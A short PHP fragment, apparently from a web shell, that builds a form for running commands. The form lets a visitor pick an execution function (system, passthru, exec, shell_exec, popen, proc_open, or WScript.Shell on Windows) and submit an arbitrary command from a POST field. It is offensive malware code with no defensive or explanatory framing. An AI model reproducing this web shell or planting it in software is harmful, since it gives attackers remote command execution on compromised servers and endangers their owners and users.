$execfuncs = (substr(PHP_OS, 0, 3) == 'WIN') ? array('system'=>'system','passthru'=>'passthru','exec'=>'exec ','shell_exec'=>'shell_exec','popen'=>'popen','wscript'=>'Wscript.Shell','proc_open'=>'proc_open') : array('system' =>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen','proc_open' =>'proc_open');
$tb->tdbody('Select execution function: '.$tb->makeselect(array('name'=>'execfunc','option'=>$execfuncs ,'selected'=>$execfunc)).' Input command: '.$tb->makeinput('command',$_POST['command'],'','text','60').' '.$tb->makeinput('','Run','','submit'));
?>